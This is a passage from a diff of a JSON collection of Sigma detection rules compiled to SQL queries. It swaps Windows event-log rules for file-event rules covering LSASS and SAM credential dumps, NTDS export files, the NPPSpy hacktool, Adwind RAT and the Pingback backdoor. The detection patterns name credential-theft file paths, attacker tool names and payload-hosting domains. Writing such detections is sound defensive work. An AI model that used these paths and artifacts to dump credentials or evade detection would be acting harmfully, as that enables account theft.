'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "Potential SAM Database Dump", + "id": 
"4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "attack.credential_access", + "attack.t1003.002" ], - "filename": "win_terminalservices_rdp_ngrok.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "Rare cases of administrative activity" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall 
Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + 
"filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE 
'%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "description": "Detects windows executables that writes files with suspicious extensions", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE 
'%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": 
"ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE 
'%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Antivirus products" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND 
RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": 
"Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs 
WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez 
@Cyb3rPandaH", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian 